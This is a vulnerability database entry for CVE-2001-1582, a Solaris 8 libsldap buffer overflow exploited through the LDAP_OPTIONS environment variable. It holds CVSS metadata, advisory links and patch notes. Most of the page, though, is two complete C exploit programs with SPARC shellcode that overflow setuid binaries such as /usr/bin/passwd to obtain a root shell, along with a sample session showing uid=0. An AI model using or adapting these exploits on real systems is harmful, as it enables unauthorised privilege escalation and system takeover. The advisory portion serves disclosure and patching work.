CVE-2001-1582
CVSS 7.2
Published: 2001-12-31 00:00:00
Last modified: 2008-09-05 00:00:00

[Original] Buffer overflow in the LDAP naming services library (libsldap) in Sun Solaris 8 allows local users to execute arbitrary code via a long LDAP_OPTIONS environment variable to a privileged program that uses libsldap.


[CNNVD] Solaris libsldap Buffer Overflow Vulnerability (CNNVD-200112-240)

        The LDAP naming services library (libsldap) of Sun Solaris 8 contains a vulnerability. A local user can execute arbitrary code by supplying an overly long LDAP_OPTIONS environment variable to a program that uses libsldap.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can result in a complete system outage]
Access complexity: LOW [no special access conditions are needed to exploit]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is required to exploit]

- CWE (weakness category)

CWE-119 [Improper Restriction of Operations within the Bounds of a Memory Buffer]

- CPE (affected platforms and products)

cpe:/o:sun:solaris:8.0
cpe:/o:sun:solaris:8.0:unkown:x86

- OVAL (technical details for detection)

No related OVAL definitions found.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1582
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1582
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200112-240
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/2931
(PATCH)  BID  2931
http://www.securiteam.com/unixfocus/5IP0O2A4KS.html
(UNKNOWN)  MISC  http://www.securiteam.com/unixfocus/5IP0O2A4KS.html
http://seclists.org/bugtraq/2001/Jun/0365.html
(UNKNOWN)  BUGTRAQ  20010626 Solaris 8 libsldap buffer overflow
http://seclists.org/bugtraq/2001/Jul/0091.html
(UNKNOWN)  BUGTRAQ  20010706 Re: Solaris 8 libsldap exploit
http://seclists.org/bugtraq/2001/Jul/0077.html
(UNKNOWN)  BUGTRAQ  20010705 Solaris 8 libsldap exploit

- Vulnerability information

Solaris libsldap Buffer Overflow Vulnerability
High severity; buffer overflow
2001-12-31 00:00:00 2007-10-03 00:00:00
Local
        The LDAP naming services library (libsldap) of Sun Solaris 8 contains a vulnerability. A local user can execute arbitrary code by supplying an overly long LDAP_OPTIONS environment variable to a program that uses libsldap.

- Advisories and patches

        Sun has released fixes for Sparc and x86 versions of Solaris.

        Sun Solaris 8_x86
          • Sun 111091-03

        Sun Solaris 8

- Vulnerability information (20969)

Solaris 8 libsldap Buffer Overflow Vulnerability (1) (EDBID:20969)
Platform: solaris; Type: local
Date: 2001-06-26 (Verified)
Author: noir
source: http://www.securityfocus.com/bid/2931/info

Solaris 8 ships with a shared library that implements LDAP functionality called 'libsldap'. This library is linked to by a number of system utilities, many of them installed setuid or setgid.

Libsldap contains a buffer overflow vulnerability in its handling of the 'LDAP_OPTIONS' environment variable.

Local attackers can exploit this vulnerability in setuid/setgid programs linked to libsldap to elevate privileges.

/** !!!PRIVATE!!!
 ** noir@gsu.linux.org.tr
 ** libsldap.so.1 $LDAP_OPTIONS environment variable overflow exploit;
 **
 **/

#include <stdio.h>
#include <stdlib.h>     /* exit(), atoi() */
#include <string.h>     /* memset(), memcpy(), strlen() */
#include <unistd.h>     /* execle() */

#define ADJUST      1   /* alignment padding before the return-address fill */


/* anathema@hack.co.za
** Solaris/SPARC shellcode
** setreuid(0, 0); setregid(0, 0); execve("/bin/sh", args, 0);
*/

char shellcode[] =
"\x90\x1a\x40\x09\x92\x1a\x40\x09\x82\x10\x20\xca\x91\xd0\x20\x08"
"\x90\x1a\x40\x09\x92\x1a\x40\x09\x82\x10\x20\xcb\x91\xd0\x20\x08"
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
"\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08";

/* one entry per setuid target: menu label, program path, guessed return address */
struct type {
char *string;
char *path;
long retaddr;
};

struct type target[] =
      {
	{ "0, /usr/bin/passwd Solaris8, Sparc64", "/usr/bin/passwd", 0xffbefe98 },
	{ "1, /usr/bin/nispasswd Solaris8, Sparc64", "/usr/bin/nispasswd", 0xffbefe98 },
	{ "2, /usr/bin/yppasswd Solaris8, Sparc64", "/usr/bin/yppasswd", 0xffbefe98 },
	{ "3, /usr/bin/chkey Solaris8, Sparc64 ", "/usr/bin/chkey", 0xffbefea8 },
	{ "4, /usr/lib/sendmail Solaris8, Sparc64", "/usr/lib/sendmail", 0xffbefeb8 },
	{ NULL, NULL, 0 }
      };

int i;
unsigned long ret_adr;
char ldap[4000];                 /* "LDAP_OPTIONS=" followed by repeated return addresses */
char egg[400];                   /* filler sled with the shellcode placed in the middle */
char *envs[] = { ldap, egg, NULL };

int main(int argc, char *argv[])
{
      int t;

      if(!argv[1])
      {
              fprintf(stderr, "libsldap.so.1 $LDAP_OPTIONS environment variable \
buffer overflow\nExploit code: noir@gsu.linux.org.tr\nBug discovery: sway@hack.co.za\n\nUsage: %s target#\n\n", argv[0]);
              for(i = 0; target[i].string != NULL; i++)
                      fprintf(stderr,"target#: %s\n", target[i].string);
              exit(0);
      }

  /* reject a target number outside the table instead of reading past its end */
  t = atoi(argv[1]);
  if (t < 0 || t >= (int)(sizeof target / sizeof target[0]) - 1)
  {
      fprintf(stderr, "unknown target# %s\n", argv[1]);
      exit(1);
  }
  ret_adr = target[t].retaddr;

  /* egg: 4-byte filler instructions (32-bit SPARC long) with the shellcode at offset 200 */
  memset(egg, 0x00, sizeof egg);
  for(i = 0 ; i < 400 - (int)strlen(shellcode) ; i +=4)
  *(long *)&egg[i] =  0xa61cc013;
  for (i= 0 ; i < (int)strlen(shellcode); i++)
     egg[200+i]=shellcode[i];

 /* ldap: ADJUST alignment bytes, then the return address repeated big-endian,
  * stopping before the end of the buffer so no write lands past ldap[3999] */
 for ( i = 0; i <  ADJUST; i++) ldap[i]=0x58;
 for (i = ADJUST; i + 3 < (int)sizeof ldap; i+=4)
    {
      ldap[i+3]=ret_adr & 0xff;
      ldap[i+2]=(ret_adr >> 8 ) &0xff;
      ldap[i+1]=(ret_adr >> 16 ) &0xff;
      ldap[i+0]=(ret_adr >> 24 ) &0xff;
    }
memcpy(ldap, "LDAP_OPTIONS=", 13);

ldap[strlen(ldap) - 3] = 0x00; /* cut the value short so the string ends on a whole address */

execle(target[t].path, "12341234", (char *)0, envs);
perror("execle");  /* only reached if the exec itself failed */
return 1;

}


- Vulnerability information (20970)

Solaris 8 libsldap Buffer Overflow Vulnerability (2) (EDBID:20970)
Platform: solaris; Type: local
Date: 2001-06-27 (Verified)
Author: Fyodor
source: http://www.securityfocus.com/bid/2931/info

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <strings.h>    /* bzero() */


/* $Id: ldap_exp2.c,v 1.1 2001/06/27 23:01:04 fygrave Exp $
 *
 * victim% ./lod -s 316 -p 5
 * jumping into: ffbefe74 (buf size: 156, soff: 316, stack: ffbefd38)
 * # id
 * uid=0(root) gid=200(em) egid=3(sys)
 * # uname -a
 * SunOS victim 5.8 Generic_108528-06 sun4u sparc SUNW,Ultra-60
 * # ^D
 * victim%
 * Thu Jun 28 05:22:38 ICT 2001
 * Fyodor <fygrave@tigerteam.net>
 */

#define NOP "\x80\x1c\x40\x11"   /* 4-byte SPARC no-op used for the sled */
#define BUFSIZE 156              /* bytes of padding before the saved return address */
#define LOCALBUF 10000
#define NOPS     1964            /* number of NOP instructions in the sled */
#define PAD 3                    /* alignment bytes between address and sled */
#define SOFF 664                 /* default offset added to the current stack pointer */

char shellcode[]=

"\x90\x1a\x40\x09"  /*  xor  %o1, %o1, %o0 */
"\x82\x10\x20\x17"  /*  mov  0x17, %g1 */
"\x91\xd0\x20\x08"  /*  ta  8 */
"\x20\xbf\xff\xff"  /*  bn,a   0x108b4 <main+8> */
"\x20\xbf\xff\xff"  /*  bn,a   0x108b8 <maino> */
"\x7f\xff\xff\xff"  /*  call  0x108bc <shellcode> */
"\x90\x03\xe0\x30"  /*  add  %o7, 0x30, %o0 */
"\x92\x03\xe0\x28"  /*  add  %o7, 0x28, %o1 */
"\xc0\x2b\xe0\x38"  /*  clrb  [ %o7 + 0x38 ] */
"\xd0\x23\xe0\x28"  /*  st  %o0, [ %o7 + 0x28 ] */
"\xc0\x23\xe0\x2c"  /*  clr  [ %o7 + 0x2c ] */
"\x82\x10\x20\x0b"  /*  mov  0xb, %g1 */
"\x91\xd0\x20\x08"  /*  ta  8 */
"\x82\x10\x20\x01"  /*  mov  1, %g1 */
"\x91\xd0\x20\x08"  /*  ta  8 */
"\x41\x41\x41\x41"  /*  AAAA */
"\x41\x41\x41\x41"  /*  AAAA */
"\x2f\x62\x69\x6e"  /*  /bin */
"\x2f\x6b\x73\x68"  /*  /ksh */
"\x41\x57\x68\x6f";  /*  junk */

extern char *optarg;

/* SPARC only: the callee's %i0 is the caller's %o0 (the return value register),
 * so copying %sp there returns the current stack pointer without a C return. */
unsigned long get_sp(void) {

   __asm__("mov %sp,%i0 \n");

}

int main(int argc, char **argv) {

    static    char buf[LOCALBUF], *ptr;
    unsigned long addr, bufsize, soff, pad;
    int i, c;

    soff = SOFF;
    bufsize = BUFSIZE;
    pad = PAD;

    /* getopt() returns -1 (not EOF) when the options are exhausted */
    while((c = getopt(argc, argv, "s:b:p:h")) != -1)
        switch(c) {
            case 'b':
                bufsize = strtoul(optarg,NULL,0);
                break;
            case 's':
                soff = strtoul(optarg,NULL,0);
                break;
            case 'p':
                pad = strtoul(optarg,NULL,0);
                break;
            case 'h':
            default:
                fprintf(stderr,"usage: %s [-b buffsize] [-s stackoff] [-p pad]\n",
                argv[0]);
                exit(1);
        }


    bzero(buf, sizeof(buf));

    /* layout: "LDAP_OPTIONS=" | bufsize x 'A' | addr | addr | pad x 'A' | NOP sled | shellcode */
    strcpy(buf,"LDAP_OPTIONS=");
    ptr=buf + strlen(buf);

    for(i=0;i<(int)bufsize;i++, ptr++) *ptr='A';

    addr = get_sp() + soff;
    memcpy(ptr,(char *)&addr, 4);
    memcpy(ptr+4,(char *)&addr, 4);
    ptr+=8;

    for(i=0;i<(int)pad;i++, ptr++) *ptr='A';
    for(i=0;i<NOPS;i++, ptr+=4) memcpy(ptr, NOP, 4);
    strcat(buf, shellcode);

    putenv(buf);
    fprintf(stderr,"jumping into: %lx (buf size: %lu, soff: %lu, stack: %lx)\n",
        addr, bufsize, soff, get_sp());

    execl("/bin/passwd","lameswd",(char *)0);
    perror("execl");  /* only reached if the exec itself failed */
    return 1;
}

- Vulnerability information

45904
Solaris LDAP Naming Services Library (libsldap) LDAP_OPTIONS Environment Variable Local Overflow
Local Access Required; Input Manipulation
Loss of Integrity; Patch / RCS
Vendor Verified

- Vulnerability description

- Timeline

2001-06-27 Unknown
2001-06-27 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Sun has released a patch to address this vulnerability.

- Related references

- Vulnerability author

Unknown or Incomplete